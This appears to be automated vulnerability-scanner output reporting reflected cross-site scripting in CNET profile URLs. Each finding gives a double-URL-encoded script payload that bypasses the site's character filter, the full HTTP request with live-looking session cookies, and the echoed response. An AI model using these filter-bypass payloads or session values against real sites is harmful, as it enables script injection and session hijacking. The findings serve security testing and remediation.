The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79343%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed5d5fb9b0 was submitted in the REST URL parameter 2. This input was echoed as 79343"><script>alert(1)</script>1ed5d5fb9b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mattfitzgerald--200879343%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed5d5fb9b0/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:26 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:26 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=993 Connection: Keep-Alive Content-Length: 31185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="mattfitzgerald--200879343"><script>alert(1)</script>1ed5d5fb9b0"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eeaab%253cscript%253ealert%25281%2529%253c%252fscript%253e3826c1a0c2f was submitted in the REST URL parameter 2. This input was echoed as eeaab<script>alert(1)</script>3826c1a0c2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mattfitzgerald--2008eeaab%253cscript%253ealert%25281%2529%253c%252fscript%253e3826c1a0c2f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:27 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:28 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=993 Connection: Keep-Alive Content-Length: 31163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>mattfitzgerald--2008eeaab<script>alert(1)</script>3826c1a0c2f's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d308a%253cscript%253ealert%25281%2529%253c%252fscript%253e5a7f798207 was submitted in the REST URL parameter 2. This input was echoed as d308a<script>alert(1)</script>5a7f798207 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mbrookecd308a%253cscript%253ealert%25281%2529%253c%252fscript%253e5a7f798207/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:49 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:49 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=938 Connection: Keep-Alive Content-Length: 31059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>mbrookecd308a<script>alert(1)</script>5a7f798207's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61ca6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2784d3572aa was submitted in the REST URL parameter 2. This input was echoed as 61ca6"><script>alert(1)</script>2784d3572aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mbrookec61ca6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2784d3572aa/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:48 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:48 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=933 Connection: Keep-Alive Content-Length: 31064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="mbrookec61ca6"><script>alert(1)</script>2784d3572aa"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ecc0%253cscript%253ealert%25281%2529%253c%252fscript%253e92bbe5ae8d2 was submitted in the REST URL parameter 2. This input was echoed as 5ecc0<script>alert(1)</script>92bbe5ae8d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/meyersm5ecc0%253cscript%253ealert%25281%2529%253c%252fscript%253e92bbe5ae8d2/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:29 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:29 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=964 Connection: Keep-Alive Content-Length: 31078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>meyersm5ecc0<script>alert(1)</script>92bbe5ae8d2's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e74d93071d was submitted in the REST URL parameter 2. This input was echoed as 537f5"><script>alert(1)</script>9e74d93071d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/meyersm537f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e74d93071d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:26 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:26 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=982 Connection: Keep-Alive Content-Length: 31092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="meyersm537f5"><script>alert(1)</script>9e74d93071d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b54db%253cscript%253ealert%25281%2529%253c%252fscript%253e0e37451c9ed was submitted in the REST URL parameter 2. This input was echoed as b54db<script>alert(1)</script>0e37451c9ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/milappb54db%253cscript%253ealert%25281%2529%253c%252fscript%253e0e37451c9ed/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:38 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:38 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=943 Connection: Keep-Alive Content-Length: 31008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>milappb54db<script>alert(1)</script>0e37451c9ed's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ef8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7854d2adf37 was submitted in the REST URL parameter 2. This input was echoed as b1ef8"><script>alert(1)</script>7854d2adf37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/milappb1ef8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7854d2adf37/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:36 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:37 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=984 Connection: Keep-Alive Content-Length: 31044
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="milappb1ef8"><script>alert(1)</script>7854d2adf37"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e8105%253cscript%253ealert%25281%2529%253c%252fscript%253e5f027d5a52e was submitted in the REST URL parameter 2. This input was echoed as e8105<script>alert(1)</script>5f027d5a52e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mlamonicae8105%253cscript%253ealert%25281%2529%253c%252fscript%253e5f027d5a52e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:36 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:36 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=928 Connection: Keep-Alive Content-Length: 31035
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>mlamonicae8105<script>alert(1)</script>5f027d5a52e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d356c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88bea675716 was submitted in the REST URL parameter 2. This input was echoed as d356c"><script>alert(1)</script>88bea675716 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mlamonicad356c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88bea675716/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:35 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:35 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=949 Connection: Keep-Alive Content-Length: 31079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="mlamonicad356c"><script>alert(1)</script>88bea675716"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dcadc%253cscript%253ealert%25281%2529%253c%252fscript%253e360f87612ee was submitted in the REST URL parameter 2. This input was echoed as dcadc<script>alert(1)</script>360f87612ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mollywooddcadc%253cscript%253ealert%25281%2529%253c%252fscript%253e360f87612ee/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:12 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:13 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=986 Connection: Keep-Alive Content-Length: 31066
